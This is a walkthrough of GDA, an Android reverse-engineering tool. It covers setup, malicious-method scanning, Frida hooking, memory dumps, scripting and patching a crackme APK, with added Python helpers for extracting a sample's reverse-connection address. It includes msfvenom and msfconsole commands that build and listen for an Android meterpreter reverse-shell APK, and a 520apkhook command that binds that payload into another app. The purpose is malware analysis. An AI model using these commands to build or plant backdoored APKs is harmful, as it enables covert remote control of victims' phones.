Introduction

This article gives a brief, case-study based introduction to each function of GDA.

Note: for an in-depth description of each function, see the Analysis Wizard section of the website.

Update date: 31 July 2023

You are welcome to join the Slack channel to exchange ideas about using GDA and about Android reverse engineering.

Environment Configuration

Configuration interface

Configuration Wizard

After selecting a configuration item, move the mouse pointer into the blank area on the left and a prompt describing that item pops up.

Python:

Note: the current GDA release (4.08) requires a 32-bit Python, for example:

Python 2.7.18 https://www.python.org/ftp/python/2.7.18/python-2.7.18.msi

Java:

Java 8: jdk-8u371-windows-i586

https://www.oracle.com/cn/java/technologies/downloads/#java8-windows

Generate key

keytool -genkey -v -keystore app.keystore -alias gundam_wing -keyalg RSA -validity 20000

Convert key format

keytool -importkeystore -srckeystore app.keystore -destkeystore tmp.p12 -srcstoretype JKS -deststoretype PKCS12

Dump the PKCS12-formatted key into directly readable text

openssl pkcs12 -in tmp.p12 -nodes -out tmp.rsa.pem

gedit tmp.rsa.pem

Extract the content of the text and create two files based on the BEGIN/END markers of each block, for example:

my_private.rsa.pem

my.x509.pem

Convert it to generate a private key in pk8 format

openssl pkcs8 -topk8 -outform DER -in my_private.rsa.pem -inform PEM -out my_private.pk8 -nocrypt
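The manual step of splitting the tmp.rsa.pem dump into my_private.rsa.pem and my.x509.pem, written out as an added Python example (this is not code from the GDA project or from the original article). It assumes the dump has the layout that `openssl pkcs12 -nodes` writes (Bag Attributes followed by PEM blocks); the sample dump and its base64 bodies are constructed placeholders, not a real key or certificate, and the file and function names are the example's own.

```python
import base64
import os
import re
import tempfile

# Constructed stand-in for the tmp.rsa.pem dump written by `openssl pkcs12 -nodes`.
# The base64 bodies are a hand-made 5-byte DER SEQUENCE (a placeholder), not a
# real key or certificate, so this text never contains usable key material.
SAMPLE_PEM_DUMP = """Bag Attributes
    friendlyName: gundam_wing
    localKeyID: 01 02 03
Key Attributes: <No Attributes>
-----BEGIN PRIVATE KEY-----
MAMCAQU=
-----END PRIVATE KEY-----
Bag Attributes
    friendlyName: gundam_wing
subject=CN=example
issuer=CN=example
-----BEGIN CERTIFICATE-----
MAMCAQU=
-----END CERTIFICATE-----
"""

PEM_BLOCK = re.compile(
    r"-----BEGIN (?P<label>[A-Z0-9 ]+)-----\r?\n(?P<body>.*?)-----END (?P=label)-----",
    re.DOTALL,
)


def split_pem_dump(text):
    """Return {label: [pem_block, ...]} for every PEM block in the dump.
    Everything outside the BEGIN/END markers (Bag Attributes, subject=, ...)
    is dropped, which is the manual copy step described in the text."""
    blocks = {}
    for m in PEM_BLOCK.finditer(text):
        label = m.group("label")
        body = m.group("body").strip()
        block = "-----BEGIN %s-----\n%s\n-----END %s-----\n" % (label, body, label)
        blocks.setdefault(label, []).append(block)
    return blocks


def pem_to_der(pem_block):
    """Base64-decode one PEM block to DER and check the outer ASN.1 SEQUENCE tag."""
    body = "".join(l for l in pem_block.splitlines() if not l.startswith("-----"))
    der = base64.b64decode(body, validate=True)
    if not der or der[0] != 0x30:
        raise ValueError("PEM body is not a DER SEQUENCE")
    return der


def extract_key_and_cert(text):
    """Pick the private key and certificate blocks out of the dump.
    Returns {'key_label', 'key_pem', 'cert_pem', 'key_der'}; raises if either is missing."""
    blocks = split_pem_dump(text)
    key_labels = [l for l in blocks if l.endswith("PRIVATE KEY")]
    if not key_labels or "CERTIFICATE" not in blocks:
        raise ValueError("dump lacks a private key or a certificate block")
    key_label = key_labels[0]
    key_pem = blocks[key_label][0]
    return {
        "key_label": key_label,
        "key_pem": key_pem,
        "cert_pem": blocks["CERTIFICATE"][0],
        # Only for an unencrypted PKCS#8 "PRIVATE KEY" block is this DER the same
        # thing `openssl pkcs8 -topk8 -nocrypt -outform DER` writes; a PKCS#1
        # "RSA PRIVATE KEY" block still needs that openssl step to be wrapped.
        "key_der": pem_to_der(key_pem),
    }


def write_key_and_cert(text, out_dir):
    """Write my_private.rsa.pem, my.x509.pem and my_private.pk8 into out_dir."""
    parts = extract_key_and_cert(text)
    paths = {
        "key": os.path.join(out_dir, "my_private.rsa.pem"),
        "cert": os.path.join(out_dir, "my.x509.pem"),
        "pk8": os.path.join(out_dir, "my_private.pk8"),
    }
    with open(paths["key"], "w") as f:
        f.write(parts["key_pem"])
    with open(paths["cert"], "w") as f:
        f.write(parts["cert_pem"])
    with open(paths["pk8"], "wb") as f:
        f.write(parts["key_der"])
    return paths


if __name__ == "__main__":
    out = write_key_and_cert(SAMPLE_PEM_DUMP, tempfile.mkdtemp())
    for name, path in out.items():
        print(name, path, os.path.getsize(path), "bytes")
```

Keep the PEM-to-DER shortcut in mind when reading the output: it only replaces the openssl pkcs8 command when the dump already uses the PKCS#8 "PRIVATE KEY" header, which current OpenSSL releases write; otherwise run the command from the text on the extracted file.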

Demo APK information

Sample code from Android Studio: Hello Android

Running result

Requested permissions

Malicious Information Scanning

A number of methods were found that could be used maliciously, for example:

Reading contacts, SMS or other information

Collecting the IMEI, phone number, system version, etc.

Example: viewing and locating

GDA displays the code to assist analysis and points to the related location in the source code

(name, nearby code, location and other reference data)

Malicious APK

On a Kali system, an APK carrying a reverse shell can be generated with the following command

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.70.133 lport=55555 R > shell.apk

Listening on the attacker machine

msfconsole //Start msfconsole
use exploit/multi/handler //Load the module
set payload android/meterpreter/reverse_tcp //Select the payload
set lhost 192.168.70.133 //The same address that was set as lhost when the APK was generated
set lport 55555
exploit //Run the handler: start listening and wait for the APK to run

Listening

After installing and running the APK

Getting information about the target device

sysinfo   //Get device information

Analysis approach

Basic information query

  • BaseInfo
    Some basic information about the target APK can be seen in the BaseInfo module.

  • Certificate information
    The certificate information can be queried by clicking the function buttons or via the relevant query options in the map menu.

  • AndroidManifest.xml file
    The displayed content can be filtered, for example by services, to see which services this APK can run in the background. (A Service is a kind of application component that can perform long-running operations in the background without providing a user interface. Services can be started by other application components and keep running in the background even if the user switches to another application.)

  • Forensic information
    Unpack the APK and select the encoding format to check the information.

  • Running status detection
    Use adb shell "ps | grep <package name>" to check whether the APK is currently running on the test device.

Example query by APK package name: enter the command adb shell "ps | grep com.metasploit.stage" to check whether the APK is running on the current test device.

The test APK is running, as shown below
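The running-status check above, as an added Python example that is not part of the original article: it parses `adb shell ps` output offline and matches the process name exactly (or a `package:subprocess` name), whereas a plain `grep package` also matches any other package whose name merely contains the string. The ps listing is constructed for the example; the pids, users and the extra package names are made up.

```python
# Constructed sample of `adb shell ps` output (toybox column layout); the
# users, pids and the non-metasploit package names are invented for the example.
SAMPLE_PS = """USER           PID  PPID     VSZ    RSS WCHAN            ADDR S NAME
root             1     0   10412   2488 SyS_epoll_wait      0 S init
system         1234   512 1234567  98765 SyS_epoll_wait      0 S system_server
u0_a123        4321   512 1234567  65432 SyS_epoll_wait      0 S com.metasploit.stage
u0_a124        4322   512 1234567  65432 SyS_epoll_wait      0 S com.metasploit.stagefright
u0_a125        4323   512 1234567  65432 SyS_epoll_wait      0 S com.example.helloandroid:remote
"""


def naive_grep(ps_output, package):
    """What `ps | grep package` returns: every line containing the substring."""
    return [line for line in ps_output.splitlines() if package in line]


def running_processes(ps_output, package):
    """Return [(pid, user, name)] for processes that belong to `package`.

    The process name is the last column in both the old and the toybox ps
    layouts. A match is the package name itself or one of its sub-processes
    (`package:name`); a package whose name only starts with the same prefix,
    such as com.metasploit.stagefright here, is not a match."""
    hits = []
    for line in ps_output.splitlines():
        cols = line.split()
        if len(cols) < 4 or not cols[1].isdigit():   # header or malformed line
            continue
        user, pid, name = cols[0], int(cols[1]), cols[-1]
        if name == package or name.startswith(package + ":"):
            hits.append((pid, user, name))
    return hits


def is_running(ps_output, package):
    """True when at least one process of the package exists."""
    return bool(running_processes(ps_output, package))


if __name__ == "__main__":
    pkg = "com.metasploit.stage"
    print("grep-style matches:", len(naive_grep(SAMPLE_PS, pkg)))
    print("exact matches:     ", running_processes(SAMPLE_PS, pkg))
    print("helloandroid:      ", running_processes(SAMPLE_PS, "com.example.helloandroid"))
```

To use it on a live device, feed the function the text of `adb shell ps -A` (or `adb shell ps` on older Android releases) instead of the sample listing.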

Malicious Behaviour Scanning

HTTP Connection

A line in the malicious method list can be double-clicked to go to the relevant code page.

For example, if you click on the

Analysing the code: the part related to the network protocol (ServerSocket) uses the startsWith method to determine whether the string variable data complies with the rule. If it does, i.e. the string starts with "tcp", the string is split on ":".

Element 2 of the split result is passed to a variable that is used as the port number, and another element of the split result is passed to a variable used as the IP. If the conditions are met, a ServerSocket object is created on the specified IP and port to listen; the key parameter comes from Payload.a.

Press the shortcut key to search: Ctrl+F

Find the assignment statement and click to view it

The IP and port information for the reverse connection can now be seen

Payload.a = new byte[8196]{0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,':',0x09,0x00,'<','*',0x88,0x08,'.',0x12,0xdc,0xf8,'=',0xda,'>',0xc9,'Y',0xbd,'+','7','>',0xfd,0xc5,0xf9,0xd5,0xf6,'L','?',0x93,0xec,0xb5,'g',0x05,0xb6,0xb3,0xf2,'t','c','p',':','/','/','1','9','2','.','1','6','8','.','7','0','.','1','3','3',':','5','5','5','5','5',.....0x00,0x00,0x00,0x00,0x00,0x00,0x00};
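The parsing logic described above (startsWith "tcp", split on ":", element 2 is the port, the host comes from the element after the scheme), reimplemented as an added Python example so an analyst can pull the reverse-connection host and port out of a byte array like Payload.a statically. This is not code from the APK or from GDA. The sample array is constructed: only the leading bytes shown in the GDA output and the embedded tcp:// string are reproduced, padded with zeros, while the real array is 8196 bytes long; the function names are the example's own.

```python
import re

# Constructed stand-in for Payload.a: the leading bytes from the GDA output above,
# the embedded "tcp://host:port" string, then zero padding (the real array is
# 8196 bytes; the elided middle is not reproduced).
PAYLOAD_A = (
    bytes([0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80])
    + b":\x09\x00<*\x88\x08.\x12\xdc\xf8=\xda>\xc9Y\xbd+7>\xfd\xc5\xf9\xd5\xf6L?\x93\xec\xb5g\x05\xb6\xb3\xf2"
    + b"tcp://192.168.70.133:55555"
    + b"\x00" * 64
)

# A scheme, "://", then a run of printable non-space ASCII (stops at the 0x00 padding).
URL_RE = re.compile(rb"[a-z]+://[\x21-\x7e]+")


def find_config_strings(blob):
    """Return every scheme://... ASCII run embedded in the byte array."""
    return [m.group(0).decode("ascii") for m in URL_RE.finditer(blob)]


def parse_transport(data):
    """Mirror the stager's check: accept only strings starting with 'tcp',
    split on ':', take element 2 as the port and element 1 (minus the leading
    '//') as the host. Returns (host, port) or None when the rule is not met."""
    if not data.startswith("tcp"):
        return None
    parts = data.split(":")
    if len(parts) < 3:
        return None
    host = parts[1].lstrip("/")
    try:
        port = int(parts[2])
    except ValueError:
        return None
    if not 0 < port < 65536 or not host:
        return None
    return host, port


def extract_c2(blob):
    """Scan a raw byte array and return the first (host, port) that passes the rule."""
    for s in find_config_strings(blob):
        cfg = parse_transport(s)
        if cfg:
            return cfg
    return None


if __name__ == "__main__":
    print("embedded strings:", find_config_strings(PAYLOAD_A))
    print("reverse connection target:", extract_c2(PAYLOAD_A))
```

Running extract_c2 over the constant dumped by GDA gives the same host and port that the dynamic analysis later confirms, which is enough to write a network block rule or a detection signature without executing the sample.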

Additional tips:
Description of the global search parameters

Type:

refstr: search for strings (referenced quoted strings)

reffield: search for class variables (variables that are referenced)

method: search for methods

class: search for class names

field: global search for class variables

package: package search

bin: binary search

Content:

fuzzy: Payload

precise: "Payload"

regular expression: ~".Payload.

Window Always Display Options

Frida Dynamic Debugging

HTTP Connection related

Run the Android device (here I am running the Android emulator on the same machine as GDA)

Right-click on the following functions

The Frida version on the current machine can be seen in a pop-up window.

Message: The Android device is not running frida-server.

Use GDACMD to enter the following command to query the CPU architecture (ABI) of the Android device:

adb shell getprop ro.product.cpu.abi

Download the matching frida-server release based on the Frida version and the Android device's architecture.

Extracted files

Enter the following command to copy this file to the /data/local/tmp/ directory on the Android device and rename it frida-server

adb push frida-server-16.0.19-android-x86_64 /data/local/tmp/frida-server

frida-server can be started by entering the following commands

Note: su switches to root privileges.

adb shell
su
cd /data/local/tmp
chmod 755 frida-server
./frida-server

nohup ./frida-server &
#Runs in the background and keeps running even after the terminal session is closed

  • Custom JS Scripts
    Click Execute, or use the shortcut F5

Scripting

Viewing the introduction information

String java class

startsWith method

setImmediate(function() {
    Java.perform(function() {
        // Hook java.lang.String.startsWith(String) so that every prefix test the app
        // performs (including the "tcp" check on the transport string) is logged.
        var Stringg = Java.use("java.lang.String");
        console.log("Waiting for APP permission");
        Stringg.startsWith.overload('java.lang.String').implementation = function(test) {
            console.log("----------Record TCP or HTTPS information:----------");
            console.log(this);                  // the string being tested
            var reval = this.startsWith(test);  // call the original and keep its result
            return reval;
        };
    });
});

In the right-hand window, right-click and select the Exit option to end the script execution.

This concludes the simple dynamic analysis

Bundle Hardened APK Analysis

Bundling and hardening with the 520apkhook tool

Note: the source code needs to be changed because of a naming conflict with utils.

main.py

python main.py --lhost 192.168.70.133 --lport 55555 -n ./test.apk

MalScan comparison

Original: test.apk

Bundled: AllFinish.apk

Comparison: the malicious scan found added file-manipulation methods, and there are many more files in the APK package

Memory export

Application scenario: dump memory data for analysis when the APK is hardened.

  • adb utility settings
    To avoid execution problems, the recommended settings are: make the adb environment variable point to the adb in the gdatmp directory; if the test device is an emulator, delete the adb bundled with the emulator and replace it with the adb from the gdatmp directory.

Note: when no APK is open in GDA, the gdatmp directory can be reached quickly by clicking the working directory in the map interface; if an APK is already open, go up one level from the directory shown in the navigation to view it.

Test:

As shown in the figure below, the right-hand area shows the output data

  • Dump error condition
    If the dump is not available, the Memory Dump tool can be uploaded to the Android device manually (normally it is uploaded automatically).

The Memory Dump tool is saved in the gdatmp folder of the GDA working directory.

Select the version matching the device's architecture, upload it to the Android device and give it the corresponding permissions. Example:

First delete the Gdump file in the /data/local/tmp/ directory of the Android device

adb push %APPDATA%\GDA\gdatmp\Gdumpx86_64 /data/local/tmp/Gdump
adb shell chmod 777 /data/local/tmp/Gdump

Test

Dump successful alert window

Clicking OK opens the path where the dump file is saved in Explorer.

Running Scripts

Python script

Test script

1.py

# GDA loads this script and calls GDA_MAIN with the object of the opened APK
def GDA_MAIN(gda_obj):
    per = 'The apk permission:\n'
    per += gda_obj.GetPermission()   # GDA API: permissions declared by the APK
    gda_obj.log(per)                 # show the result in the GDA log window
    with open('out.txt', 'w') as tofile:   # and also save it to out.txt
        tofile.write(per)
    return 0

Changes to the interface after running, with the out.txt and 1.pyc files produced

Java script

Test script

1.java

package example;
import com.gda.api.GDAInterface;
import com.gda.api.GdaDex;
import com.gda.api.MethodInfo;
import com.gda.api.DexHeader;
//gjden
//example of dumping all the callers of a method
class Example4Callor {
    public int GDA_MAIN(GDAInterface gda)
    {
        String callorStr = "";
        GdaDex Dex0 = gda.DexList.get(0);
        for (MethodInfo method : Dex0.MethodList) {
            // take the first method that has more than 5 callers
            if (method != null && method.callorIdxList.length > 5) {
                callorStr = String.format("the [%d] callors of the method: %s\n\n", method.callorIdxList.length, method.methodFullName);
                for (int calloridx : method.callorIdxList) {
                    String index = "" + calloridx;
                    if (Dex0.MethodTable.containsKey(index)) {
                        MethodInfo obj = Dex0.MethodTable.get(index);
                        callorStr += obj.methodFullName;
                        callorStr += obj.MethodSignature;
                        callorStr += "\n";
                    }
                }
                break;
            }
        }
        gda.log(callorStr);
        return 0;
    }
}

If a .java file is loaded directly, the following window pops up

Loading compiled class files

The relevant scripts can be viewed at the GitHub project https://github.com/charles2gan/GDA-android-reversing-Tool

Application Cases

Modify file

Test file: https://github.com/num1r0/android_crackmes

After loading the test file, click Enter to go to the entry area.

Double-click MainActivity$1 with the left mouse button to enter the MainActivity area

Double-click getFlag with the left mouse button

1. View related information: double-click GETDATA with the left mouse button

s3cr37_p4ssw0rd_1337

2. Modify the judgment: press F5 or right-click Smali Java in the function window that pops up

Smali code

  • NOP modification

Press R to save the changes

Click OK to install the modified APK on the test device

Successful installation message

Running test

  • Modify a command

Modify if-eqz to if-nez

Right-click to see a menu of related functions

Press M to modify the currently selected command

Press Enter to confirm the modification.

Press R to save the changes and test

This article ends here.